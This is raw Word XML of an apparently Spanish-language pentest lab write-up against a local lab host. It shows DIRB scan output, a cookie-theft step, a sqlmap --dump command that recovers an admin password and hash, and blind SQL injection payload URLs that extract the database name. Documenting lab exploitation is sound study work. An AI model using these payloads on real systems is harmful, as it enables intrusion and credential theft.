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DA054" w14:textId="2E1197A8" w:rsidR="00DD619C" w:rsidRDefault="003C347E">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="001C6B6B" w:rsidRPr="001C6B6B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429D351B" wp14:editId="00EC4602">
            <wp:extent cx="5400040" cy="4265295"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1404909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9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87F" w14:textId="3BBABF55" w:rsidR="00212F0A" w:rsidRDefault="00385DCA">
      <w:r w:rsidRPr="009235B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="064AE1D2" wp14:editId="29684E99">
            <wp:extent cx="5400040" cy="4804410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="227554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4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88D0" w14:textId="1AF4D8AD" w:rsidR="00385DCA" w:rsidRDefault="00385DCA">
      <w:r w:rsidRPr="00385DCA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E29309A" wp14:editId="481B2304">
            <wp:extent cx="5400040" cy="3100705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="9038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4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899E" w14:textId="77777777" w:rsidR="00F77E62" w:rsidRDefault="00F77E62"/>
    <w:p w14:paraId="30A8B408" w14:textId="6E77EC39" w:rsidR="00F77E62" w:rsidRDefault="00F77E62">
      <w:r w:rsidRPr="00F77E62">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09AE3262" wp14:editId="7ACF8DD3">
            <wp:extent cx="4382112" cy="6992326"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1161700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00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C0B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DIRB v2.22    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1264363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By The Dark Raver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2981D09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-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742C62E2" w14:textId="77777777" w:rsidR="0016534F" w:rsidRPr="0016534F" w:rsidRDefault="0016534F" w:rsidP="0016534F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65DA681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START_TIME: Wed Jul 24 04:29:05 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D93605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URL_BASE: http://10.0.2.20/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FA1F9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lastRenderedPageBreak/>
        <w:t>WORDLIST_FILES: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016534F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016534F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/dirb/wordlists/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779B4337" w14:textId="77777777" w:rsidR="0016534F" w:rsidRPr="0016534F" w:rsidRDefault="0016534F" w:rsidP="0016534F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6E80E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-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5300CC" w14:textId="77777777" w:rsidR="0016534F" w:rsidRPr="0016534F" w:rsidRDefault="0016534F" w:rsidP="0016534F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37524968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GENERATED WORDS: 4612                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD6F691" w14:textId="77777777" w:rsidR="0016534F" w:rsidRPr="0016534F" w:rsidRDefault="0016534F" w:rsidP="0016534F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53BE061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Scanning URL: http://10.0.2.20/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFBC1D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http://10.0.2.20/admin/                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44495FF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http://10.0.2.20/all (CODE:200|SIZE:644)                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF3DD1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http://10.0.2.20/cgi-bin/ (CODE:403|SIZE:285)                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F75FBC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http://10.0.2.20/classes/                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C489FC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http://10.0.2.20/css/                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5926DF73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http://10.0.2.20/favicon.ico (CODE:200|SIZE:14634)                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43571B2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http://10.0.2.20/footer (CODE:200|SIZE:185)                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB9F2A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http://10.0.2.20/header (CODE:200|SIZE:571)                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F9737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http://10.0.2.20/images/                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5478CDA7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http://10.0.2.20/index (CODE:200|SIZE:1311)                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3976741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http://10.0.2.20/index.php (CODE:200|SIZE:1311)                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105113F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http://10.0.2.20/post (CODE:200|SIZE:786)                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1178A52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http://10.0.2.20/server-status (CODE:403|SIZE:290)                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C63C31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7A4157D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http://10.0.2.20/admin/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D31225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http://10.0.2.20/admin/del (CODE:302|SIZE:0)                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376BDCD9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http://10.0.2.20/admin/edit (CODE:302|SIZE:0)                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40044EA4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http://10.0.2.20/admin/footer (CODE:200|SIZE:19)                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0049D34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http://10.0.2.20/admin/header (CODE:200|SIZE:653)                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C162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http://10.0.2.20/admin/index (CODE:302|SIZE:0)                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B29ABB5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http://10.0.2.20/admin/index.php (CODE:302|SIZE:0)                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AD1E10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http://10.0.2.20/admin/login (CODE:200|SIZE:1387)                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34672773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http://10.0.2.20/admin/logout (CODE:302|SIZE:0)                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461463C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http://10.0.2.20/admin/new (CODE:302|SIZE:0)                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D0555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lastRenderedPageBreak/>
        <w:t xml:space="preserve">==&gt; DIRECTORY: http://10.0.2.20/admin/uploads/                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D67F4C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38274DC4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http://10.0.2.20/classes/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF244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497EB977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1D9DDAA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4BD9288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http://10.0.2.20/css/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F3CAC8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77B7466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4D14BEE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2FEC6389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http://10.0.2.20/images/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB33A6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68D4BE7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449B996C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205994E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http://10.0.2.20/admin/uploads/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B3605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27843A2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16B6F13D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03515E32" w14:textId="77777777" w:rsidR="0016534F" w:rsidRPr="003C347E" w:rsidRDefault="0016534F" w:rsidP="0016534F">
      <w:r w:rsidRPr="003C347E">
        <w:t>-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB56E98" w14:textId="427206B8" w:rsidR="0085072B" w:rsidRDefault="00F77E62">
      <w:r w:rsidRPr="00F77E62">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B789A03" wp14:editId="4CB91E69">
            <wp:extent cx="4496427" cy="5801535"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1264516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6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D32E" w14:textId="33F832CE" w:rsidR="004F4306" w:rsidRPr="00F77E62" w:rsidRDefault="00F77E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.- </w:t>
      </w:r>
      <w:r w:rsidR="004F4306" w:rsidRPr="00F77E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ejecuto </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F4306" w:rsidRPr="00F77E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F4306" w:rsidRPr="00F77E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F4306" w:rsidRPr="00F77E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sacr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F4306" w:rsidRPr="00F77E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie admin y entrar de administrador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6208ABC3" w14:textId="77777777" w:rsidR="00D711C9" w:rsidRDefault="00D711C9"/>
    <w:p w14:paraId="4261DC33" w14:textId="77777777" w:rsidR="00D711C9" w:rsidRDefault="00D711C9"/>
    <w:p w14:paraId="7D0CBAA1" w14:textId="77777777" w:rsidR="00D711C9" w:rsidRDefault="00D711C9"/>
    <w:p w14:paraId="546F0527" w14:textId="77777777" w:rsidR="00D711C9" w:rsidRDefault="00D711C9"/>
    <w:p w14:paraId="435BBBA0" w14:textId="229436C3" w:rsidR="004F4306" w:rsidRDefault="004F4306">
      <w:r w:rsidRPr="004F4306">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B05A990" wp14:editId="511FA2B2">
            <wp:extent cx="5400040" cy="3310890"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1555765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5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A90" w14:textId="6DA532D6" w:rsidR="004F4306" w:rsidRDefault="0095733E">
      <w:r w:rsidRPr="0095733E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="759C1CEC" wp14:editId="61B61819">
            <wp:extent cx="5400040" cy="1640205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1265667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5B63" w14:textId="0AB8A39B" w:rsidR="0095733E" w:rsidRDefault="0095733E">
      <w:r>
        <w:t xml:space="preserve">Conseguida la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cooke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26CBACA3" w14:textId="757E6EBB" w:rsidR="0095733E" w:rsidRDefault="0095733E">
      <w:r w:rsidRPr="0095733E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E6AE68F" wp14:editId="5D584234">
            <wp:extent cx="5400040" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1782498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2E16" w14:textId="3F0AD4FD" w:rsidR="0095733E" w:rsidRDefault="0095733E">
      <w:r>
        <w:t>Vulnerable a SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BC9479" w14:textId="77777777" w:rsidR="0095733E" w:rsidRPr="0095733E" w:rsidRDefault="0095733E" w:rsidP="0095733E">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095733E">
        <w:lastRenderedPageBreak/>
        <w:t>  La</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095733E">
        <w:t xml:space="preserve"> función </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0095733E">
        <w:t>mysql_fetch_assoc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0095733E">
        <w:t>() espera un recurso (resultado de una consulta SQL), pero ha recibido un valor booleano (false).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D353D95" w14:textId="449899BC" w:rsidR="0095733E" w:rsidRDefault="0095733E" w:rsidP="0095733E">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095733E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0095733E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Causa</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095733E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0095733E">
        <w:t xml:space="preserve"> Esto suele ocurrir cuando la consulta SQL ha fallado, y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0095733E">
        <w:t>mysql_query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0095733E">
        <w:t>() ha devuelto false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F065EE" w14:textId="5738DAC4" w:rsidR="0095733E" w:rsidRDefault="0095733E" w:rsidP="0095733E">
      <w:r w:rsidRPr="0095733E">
        <w:t>el sistema no está manejando adecuadamente la entrada del usuario y es probable que sea vulnerable a inyección SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2480E181" w14:textId="090FCEFE" w:rsidR="000C3DEF" w:rsidRDefault="00B15E8A" w:rsidP="0095733E">
      <w:r w:rsidRPr="00B15E8A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E84988D" wp14:editId="32677E6A">
            <wp:extent cx="5400040" cy="7310755"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="102458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23A" w14:textId="2054108F" w:rsidR="009725A0" w:rsidRDefault="003B0C8B" w:rsidP="0095733E">
      <w:r w:rsidRPr="003B0C8B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Parece que el parámetro id está siendo sanitizado en el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B0C8B">
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B0C8B">
        <w:t>, posiblemente utilizando una conversión a entero (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B0C8B">
        <w:t>intval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B0C8B">
        <w:t>), lo que hace que las inyecciones SQL convencionales no funcionen. Vamos a intentar algunos enfoques alternativos para verificar y explotar la vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B07A77D" w14:textId="77777777" w:rsidR="009725A0" w:rsidRDefault="009725A0" w:rsidP="0095733E"/>
    <w:p w14:paraId="2A519315" w14:textId="475F4FDB" w:rsidR="009725A0" w:rsidRDefault="009725A0" w:rsidP="0095733E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009725A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009725A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "http://10.0.2.21/admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009725A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>edit.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009725A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=3" --cookie="PHPSESSID=s95hmsjfevcfa8njed8603q3c4" --dump </w:t>
      </w:r>
      <w:r w:rsidR="004A1F56">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="009725A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D524B01" w14:textId="77777777" w:rsidR="004A1F56" w:rsidRDefault="004A1F56" w:rsidP="0095733E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3F9E12" w14:textId="2AC9A4F3" w:rsidR="004A1F56" w:rsidRDefault="004A1F56" w:rsidP="0095733E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INTERESENTES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B3593D" w14:textId="77777777" w:rsidR="004A1F56" w:rsidRPr="004A1F56" w:rsidRDefault="004A1F56" w:rsidP="004A1F56">
      <w:r w:rsidRPr="004A1F56">
        <w:t>levantes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F735BB1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Inyección SQL Identificada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779169AB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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parámetro Vulnerable:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1F56">
        <w:t xml:space="preserve"> id en la URL http://10.0.2.21/admin/edit.php?id=3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208FB331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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tipos de Inyección:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA3232" w14:textId="77777777" w:rsidR="004A1F56" w:rsidRPr="004A1F56" w:rsidRDefault="004A1F56" w:rsidP="004A1F56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1F56">
        <w:t>Boolean-based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1F56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1F56">
        <w:t>blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24C48860" w14:textId="77777777" w:rsidR="004A1F56" w:rsidRPr="004A1F56" w:rsidRDefault="004A1F56" w:rsidP="004A1F56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A1F56">
        <w:t>Time-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1F56">
        <w:t>based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1F56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1F56">
        <w:t>blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22B0870B" w14:textId="77777777" w:rsidR="004A1F56" w:rsidRPr="004A1F56" w:rsidRDefault="004A1F56" w:rsidP="004A1F56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A1F56">
        <w:t>UNION query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6939855D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Base de Datos Identificada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE2EDA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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nombre de la Base de Datos:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1F56">
        <w:t xml:space="preserve"> blog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41185AE1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Tablas Identificadas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6342FA" w14:textId="77777777" w:rsidR="004A1F56" w:rsidRPr="004A1F56" w:rsidRDefault="004A1F56" w:rsidP="004A1F56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1F56">
        <w:t>comments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="210D5779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>posts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E190F4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>users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4382ABDE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Contenido de la Tabla users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07084B94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>Usuario admin con la contraseña P4ssw0rd (MD5 hash: 8efe310f9ab3efeae8d410a8e0166eb2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64481DC4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 xml:space="preserve">Posibles Scripts para RCE en la Tabla </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1F56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>comments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1F56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAAE077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 xml:space="preserve">Varias entradas en la tabla </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1F56">
        <w:t>comments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1F56">
        <w:t xml:space="preserve"> contienen scripts que pueden usarse para cargar una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1F56">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1F56">
        <w:t xml:space="preserve"> PHP en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1986E159" w14:textId="77777777" w:rsidR="004A1F56" w:rsidRPr="004A1F56" w:rsidRDefault="004A1F56" w:rsidP="0095733E"/>
    <w:p w14:paraId="3FD1DC4E" w14:textId="2539C605" w:rsidR="0095733E" w:rsidRDefault="00093258" w:rsidP="0095733E">
      <w:r w:rsidRPr="00093258">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="346E69D6" wp14:editId="0ADEFD2E">
            <wp:extent cx="4867954" cy="8745170"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="2116398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98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712E" w14:textId="2059F2DE" w:rsidR="00093258" w:rsidRDefault="00093258" w:rsidP="0095733E">
      <w:r w:rsidRPr="00093258">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35C6E127" wp14:editId="29B858FB">
            <wp:extent cx="4592955" cy="8892540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="40425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7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9396" w14:textId="307FF39A" w:rsidR="00093258" w:rsidRPr="004A1F56" w:rsidRDefault="00093258" w:rsidP="0095733E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:softHyphen/>
      </w:r>
      <w:r w:rsidRPr="00093258">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00093258">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F1B7A3F" wp14:editId="6C2DB4DA">
            <wp:extent cx="4975860" cy="8892540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="43543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4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C8AE" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="4E0E75AE" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="7E63EE2E" w14:textId="2B8323AB" w:rsidR="004F4306" w:rsidRDefault="00A831FE">
      <w:r w:rsidRPr="00A831FE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60FC26B1" wp14:editId="446550C2">
            <wp:extent cx="5010849" cy="7592485"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="456966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6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4A0" w14:textId="77777777" w:rsidR="00A831FE" w:rsidRPr="004A1F56" w:rsidRDefault="00A831FE"/>
    <w:p w14:paraId="771D9AD4" w14:textId="77777777" w:rsidR="004F4306" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="42C86491" w14:textId="08E29A6B" w:rsidR="006A09EA" w:rsidRPr="004A1F56" w:rsidRDefault="006A09EA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>INYECCION SQLI BLIND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC6681" w14:textId="2D77ACCE" w:rsidR="004F4306" w:rsidRDefault="00665A22">
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00530F97">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://10.0.2.21/admin/edit.php?id=1%20AND%20SUBSTRING((SELECT%20database()),%201,%201)%20=%20%27b%27--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="689229A1" w14:textId="670418B6" w:rsidR="00665A22" w:rsidRDefault="00665A22">
      <w:r>
        <w:t>la b</w:t>
      </w:r>
      <w:r w:rsidR="006A09EA">
        <w:t xml:space="preserve"> (primera letra)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151342A4" w14:textId="09AFE13D" w:rsidR="00665A22" w:rsidRDefault="006A09EA">
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00530F97">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://10.0.2.21/admin/edit.php?id=1%20AND%20SUBSTRING((SELECT%20database()),%202,%201)%20=%20%27l%27--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C428A34" w14:textId="5369E912" w:rsidR="006A09EA" w:rsidRPr="004A1F56" w:rsidRDefault="006A09EA">
      <w:r>
        <w:t>la L (segunda letra)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C6B205" w14:textId="6A72A9BC" w:rsidR="004F4306" w:rsidRDefault="00E07F19">
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00530F97">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://10.0.2.21/admin/edit.php?id=1%20AND%20SUBSTRING((SELECT%20database()),%203,%201)%20=%20%27o%27--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1353CC02" w14:textId="02DF430A" w:rsidR="00E07F19" w:rsidRDefault="00E07F19">
      <w:r>
        <w:t>LA o 3 LETRA</w:t>
      </w:r>
    </w:p>
